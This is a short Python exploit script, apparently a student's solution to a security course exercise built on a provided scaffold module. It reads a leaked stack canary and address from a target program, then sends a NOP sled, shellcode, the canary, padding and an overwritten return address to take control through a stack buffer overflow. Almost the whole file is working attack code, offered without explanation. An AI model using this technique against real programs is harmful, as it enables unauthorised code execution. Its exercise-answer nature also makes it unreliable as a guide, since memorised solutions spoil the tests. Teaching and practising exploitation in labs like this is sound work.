#!/usr/bin/env python3

import scaffold as p
from scaffold import SHELLCODE
import sys

# Configure Python to print text strings like byte strings. Don't remove this!
sys.stdout.reconfigure(encoding='latin1')

### HELPER FUNCTIONS ###

def int_to_bytes(x: int) -> str:
    return x.to_bytes((x.bit_length() + 7) // 8, 'little').decode('latin1')

### YOUR CODE STARTS HERE ###

# Program start:
p.start()

# Example send:

# Example receive:

p.recvline()
canary = p.recvline()
addr = p.recvline()
can = canary[-9:-1]
add = addr[-9:-1]

addi = int(add, 16) + 41
cani = int(can, 16)
x = int_to_bytes(addi)
y = int_to_bytes(cani)

print(can)
print(add)

p.send('\x90' * 184 + SHELLCODE + y  + 'A' * 12 +  x  + '\n')

### YOUR CODE ENDS HERE ###
